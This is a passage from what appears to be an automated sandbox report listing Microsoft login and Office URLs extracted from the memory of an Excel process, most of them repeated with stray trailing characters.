    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearer
    Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechTd
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://lifecycle.office.com
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comMBI_SSL_SHORThttps://lifecycle.office.com
    Source: EXCEL.EXE, 00000001.00000003.620552414.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.603146434.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.756814057.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599650458.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619064533.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.603553946.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.617608577.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565349896.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660803627.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.739719715.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622560891.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738569509.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623207550.0000000015B7F000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize3
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize8.
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://login.windows.local
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localtes;uY
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize6z
    Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/com
    Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authoriz
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize#
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize%
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize2
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize5
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize7
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeA4
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeC
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeE
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeI
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeK
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeN
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeO
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeR
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeTEM32G
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeVE
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeZ
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizea
